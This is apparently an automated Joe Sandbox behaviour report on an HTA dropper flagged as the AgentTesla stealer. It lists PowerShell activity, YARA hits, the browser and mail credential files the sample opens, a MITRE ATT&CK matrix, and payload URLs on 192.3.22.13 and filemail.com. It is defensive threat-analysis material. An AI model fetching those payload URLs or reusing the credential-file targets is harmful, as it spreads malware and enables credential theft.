Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 12.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.powershell.exe.95265d0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.powershell.exe.95265d0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2478122048.0000000009526000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3337236460.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 1012, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 12.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.powershell.exe.95265d0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.powershell.exe.95265d0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.3345591144.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2478122048.0000000009526000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3337236460.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 1012, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 12.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.powershell.exe.95265d0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.powershell.exe.95265d0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2478122048.0000000009526000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3337236460.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 1012, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	231 Windows Management Instrumentation	111 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	211 Process Injection	11 Deobfuscate/Decode Files or Information	1 Input Capture	35 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	531 Security Software Discovery	SMB/Windows Admin Shares	11 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	4 PowerShell	Login Hook	Login Hook	1 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	1 Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	261 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	261 Virtualization/Sandbox Evasion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	211 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
seethebestthingswithgreatsituationshandletotheprogress.hta	21%	ReversingLabs	Script-JS.Trojan.Acsogenixx

Source	Detection	Scanner	Label
http://192.3.22.13/xampp/se/seet	0%	Avira URL Cloud	safe
https://1017.filemail.com/api/file/get?filekey=2	0%	Avira URL Cloud	safe
http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIFdB	0%	Avira URL Cloud	safe
http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIFlaF	0%	Avira URL Cloud	safe
http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIFM	0%	Avira URL Cloud	safe
https://1017.filemail.com/api/file/get?filekLR	0%	Avira URL Cloud	safe
http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIF.f	0%	Avira URL Cloud	safe
http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIF	100%	Avira URL Cloud	malware
http://192.3.22.13/352/WRFFRF.txt	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
ip-api.com	208.95.112.1	true	false	high
ip.1017.filemail.com	142.215.209.78	true	false	high
1017.filemail.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f	false		high
http://192.3.22.13/352/WRFFRF.txt	true	Avira URL Cloud: safe	unknown
http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIF	true	Avira URL Cloud: malware	unknown
http://ip-api.com/line/?fields=hosting	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6S	powershell.exe, 0000000A.00000002.2427492683.0000000004EF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2424212797.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://192.3.22.13/xampp/se/seet	powershell.exe, 00000001.00000002.2267939334.0000000005151000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.2274759590.0000000005DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2153730468.00000000062F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2427492683.0000000005E05000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000003.00000002.2152246100.00000000053E6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIFdB	powershell.exe, 00000001.00000002.2277730748.0000000007718000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://account.dyn.com/	powershell.exe, 0000000A.00000002.2478122048.0000000009526000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000C.00000002.3337236460.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000A.00000002.2427492683.0000000004EF7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000003.00000002.2152246100.00000000053E6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000A.00000002.2427492683.0000000004EF7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000001.00000002.2267939334.00000000055A4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIFlaF	powershell.exe, 00000001.00000002.2277730748.0000000007718000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIFM	powershell.exe, 00000001.00000002.2277730748.0000000007692000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 0000000A.00000002.2427492683.0000000005E05000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 0000000A.00000002.2427492683.0000000005E05000.00000004.00000800.00020000.00000000.sdmp	false		high
https://1017.filemail.com	powershell.exe, 0000000A.00000002.2427492683.0000000004EF7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://go.micros	powershell.exe, 00000003.00000002.2152246100.000000000588A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 0000000A.00000002.2427492683.0000000004EF7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://1017.filemail.com/api/file/get?filekey=2	powershell.exe, 0000000A.00000002.2424212797.0000000000E80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2427492683.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2426682841.00000000030E0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://crl.m	powershell.exe, 00000008.00000002.2824080793.0000000003290000.00000004.00000020.00020000.00000000.sdmp	false		high
https://1017.filemail.com/api/file/get?filekLR	powershell.exe, 00000008.00000002.2826245247.000000000515E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.micro	powershell.exe, 00000003.00000002.2155724364.0000000007BAC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000001.00000002.2267939334.0000000004D91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2152246100.0000000005291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2826245247.0000000004E19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2826245247.0000000004E28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2427492683.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000003.00000002.2152246100.00000000053E6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 0000000A.00000002.2427492683.0000000005E05000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.2274759590.0000000005DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2153730468.00000000062F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2427492683.0000000005E05000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ip-api.com	AddInProcess32.exe, 0000000C.00000002.3345591144.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000C.00000002.3345591144.0000000002F59000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000C.00000002.3345591144.0000000002F3E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.2267939334.0000000004D91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2152246100.0000000005291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2826245247.0000000004DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2427492683.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000C.00000002.3345591144.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000C.00000002.3345591144.0000000002F3E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIF.f	powershell.exe, 00000001.00000002.2277730748.0000000007718000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.215.209.78	ip.1017.filemail.com	Canada	32156	HUMBER-COLLEGECA	false
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
192.3.22.13	unknown	United States	36352	AS-COLOCROSSINGUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1559142
Start date and time:	2024-11-20 08:27:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
